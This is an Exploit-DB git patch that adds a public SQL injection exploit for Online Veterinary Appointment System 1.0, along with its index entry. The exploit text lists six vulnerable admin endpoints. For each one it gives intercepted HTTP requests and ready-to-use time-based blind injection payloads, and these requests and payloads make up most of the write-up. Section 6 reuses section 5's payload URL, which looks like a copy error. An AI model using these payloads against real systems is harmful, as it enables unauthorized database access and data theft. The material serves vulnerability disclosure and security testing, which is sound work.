From 76c02f99c367ba8e27b3c464d60371a149815161 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sat, 8 Jan 2022 05:01:55 +0000
Subject: [PATCH] DB: 2022-01-08

1 changes to exploits/shellcodes

Online Veterinary Appointment System 1.0 - 'Multiple' SQL Injection
---
 exploits/php/webapps/50644.txt | 243 +++++++++++++++++++++++++++++++++
 files_exploits.csv             |   1 +
 2 files changed, 244 insertions(+)
 create mode 100644 exploits/php/webapps/50644.txt

diff --git a/exploits/php/webapps/50644.txt b/exploits/php/webapps/50644.txt
new file mode 100644
index 000000000..e6148f748
--- /dev/null
+++ b/exploits/php/webapps/50644.txt
@@ -0,0 +1,243 @@
+# Exploit Title: Online Veterinary Appointment System 1.0 - 'Multiple' SQL Injection
+# Date: 05/01/20222
+# Exploit Author: twseptian
+# Vendor Homepage: https://www.sourcecodester.com/php/15119/online-veterinary-appointment-system-using-phpoop-free-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/ovas.zip
+# Version: v1.0
+# Tested on: Kali Linux 2021.4
+
+=====================================================================================================================================
+SQL Injection:
+=====================================================================================================================================
+SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Online Veterinary Appointment System 1.0 is vulnerable to 'Multiple' SQL injections.
+
+=====================================================================================================================================
+Attack Vector:
+=====================================================================================================================================
+An attacker can compromise the database of the application using some automated(or manual) tools like SQLmap.
+
+=====================================================================================================================================
+1. Appointment Requests - Vulnerable Parameter(s): id
+=====================================================================================================================================
+Steps of reproduce:
+Step-1: On the dashboard navigate to 'Appointment Requests' page using the following URL:
+
+http://localhost/ovas/admin/?page=appointments
+
+then go to 'Action' > 'View'.
+
+Step-2: Put the SQL Injection payloads in 'id' field.
+time-based blind payload : page=appointments/view_details&id=1' AND (SELECT 2197 FROM (SELECT(SLEEP(5)))DZwi) AND 'mQQq'='mQQq
+
+Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.
+
+=====================================================================================================================================
+2. Inquiries - Vulnerable Parameter(s): id
+=====================================================================================================================================
+Steps of reproduce:
+Step-1: On the dashboard navigate to 'Inquiries' page using the following URL:
+
+http://localhost/ovas/admin/?page=inquiries
+
+then go to 'Action' > 'View'.
+
+Step-2: Let's intercept 'View' request using burpsuite:
+
+GET /ovas/admin/inquiries/view_details.php?id=1 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Connection: close
+Referer: http://localhost/ovas/admin/?page=inquiries
+Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+Put the SQL Injection payloads in 'id' field.
+time-based blind payload : /ovas/admin/inquiries/view_details.php?id=1' AND (SELECT 6051 FROM (SELECT(SLEEP(5)))DEds) AND 'SOxP'='SOxP
+
+Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.
+
+=====================================================================================================================================
+3. My Account - Vulnerable Parameter(s): id,firstname,lastname,username
+=====================================================================================================================================
+Steps of reproduce:
+Step-1: On the dashboard navigate to 'My Account' page using the following URL:
+
+http://localhost/ovas/admin/?page=user
+
+Step-2: then let's intercept 'Update' request using burpsuite:
+
+POST /ovas/classes/Users.php?f=save HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------24959341351495697487735843118
+Content-Length: 796
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/ovas/admin/?page=user
+Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+-----------------------------24959341351495697487735843118
+Content-Disposition: form-data; name="id"
+
+4
+-----------------------------24959341351495697487735843118
+Content-Disposition: form-data; name="firstname"
+
+user
+-----------------------------24959341351495697487735843118
+Content-Disposition: form-data; name="lastname"
+
+user
+-----------------------------24959341351495697487735843118
+Content-Disposition: form-data; name="username"
+
+user
+-----------------------------24959341351495697487735843118
+Content-Disposition: form-data; name="password"
+
+
+-----------------------------24959341351495697487735843118
+Content-Disposition: form-data; name="img"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------24959341351495697487735843118--
+
+Put the SQL Injection payloads in Vulnerable Parameter(s): id,firstname,lastname,username
+for example, the time-based blind payload in 'id':
+
+[SNIP]
+Content-Disposition: form-data; name="id"
+
+4 AND (SELECT 9713 FROM (SELECT(SLEEP(5)))YIam)
+-----------------------------24959341351495697487735843118
+Content-Disposition: form-data; name="firstname"
+
+user
+-----------------------------24959341351495697487735843118
+Content-Disposition: form-data; name="lastname"
+
+user
+-----------------------------24959341351495697487735843118
+Content-Disposition: form-data; name="username"
+
+user
+-----------------------------24959341351495697487735843118
+Content-Disposition: form-data; name="password"
+
+
+-----------------------------24959341351495697487735843118
+Content-Disposition: form-data; name="img"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------24959341351495697487735843118--
+
+Step-3: If we use BurpSuite, click 'Send'. The server target accepted our payload, and the response got delayed by 5 seconds. The same thing for other parameters
+
+=====================================================================================================================================
+4. Category List - Vulnerable Parameter(s): id
+=====================================================================================================================================
+Steps of reproduce:
+Step-1: On the dashboard navigate to 'Category List ' page using the following URL:
+
+http://localhost/ovas/admin/?page=categories
+
+then go to 'Action' > 'Edit'
+
+Step-2: Let's intercept 'Edit' request using burpsuite:
+
+GET /ovas/admin/categories/manage_category.php?id=2 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Connection: close
+Referer: http://localhost/ovas/admin/?page=categories
+Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+Put the SQL Injection payloads in 'id' field.
+time-based blind payload : /ovas/admin/categories/manage_category.php?id=2' AND (SELECT 3851 FROM (SELECT(SLEEP(5)))UFXk) AND 'XbFb'='XbFb
+
+Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.
+
+=====================================================================================================================================
+5. Service List - Vulnerable Parameter(s): id
+=====================================================================================================================================
+Steps of reproduce:
+Step-1: On the dashboard navigate to 'Service List ' page using the following URL:
+
+http://localhost/ovas/admin/?page=services
+
+then go to 'Action' > 'View'
+
+Step-2: Let's intercept 'View' request using burpsuite:
+
+GET /ovas/admin/services/view_service.php?id=4 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Connection: close
+Referer: http://localhost/ovas/admin/?page=services
+Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+Put the SQL Injection payloads in 'id' field.
+time-based blind payload : /ovas/admin/services/view_service.php?id=4' AND (SELECT 5507 FROM (SELECT(SLEEP(5)))kAsY) AND 'UrUQ'='UrUQ
+
+Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.
+
+=====================================================================================================================================
+6. Admin User List - Vulnerable Parameter(s): id
+=====================================================================================================================================
+Steps of reproduce:
+Step-1: On the dashboard navigate to 'Admin User List ' page using the following URL:
+
+http://localhost/ovas/admin/?page=user/list
+
+then go to 'Action' > 'Edit'
+
+Step-2: Let's intercept 'Edit' request using burpsuite:
+
+GET /ovas/admin/?page=user/manage_user&id=3 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Referer: http://localhost/ovas/admin/?page=user/list
+Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+Put the SQL Injection payloads in 'id' field.
+time-based blind payload : /ovas/admin/services/view_service.php?id=4' AND (SELECT 5507 FROM (SELECT(SLEEP(5)))kAsY) AND 'UrUQ'='UrUQ
+
+Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 78db1d768..65a7f6d0e 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44723,3 +44723,4 @@ id,file,description,date,author,type,platform,port
 50637,exploits/php/webapps/50637.txt,"openSIS Student Information System 8.0 - 'multiple' SQL Injection",1970-01-01,securityforeveryone.com,webapps,php,
 50641,exploits/php/webapps/50641.txt,"Projeqtor v9.3.1 - Stored Cross Site Scripting (XSS)",1970-01-01,"Oscar Gil Gutierrez",webapps,php,
 50643,exploits/php/webapps/50643.txt,"WordPress Plugin AAWP 3.16 - 'tab' Reflected Cross Site Scripting (XSS) (Authenticated)",1970-01-01,"Andrea Bocchetti",webapps,php,
+50644,exploits/php/webapps/50644.txt,"Online Veterinary Appointment System 1.0 - 'Multiple' SQL Injection",1970-01-01,twseptian,webapps,php,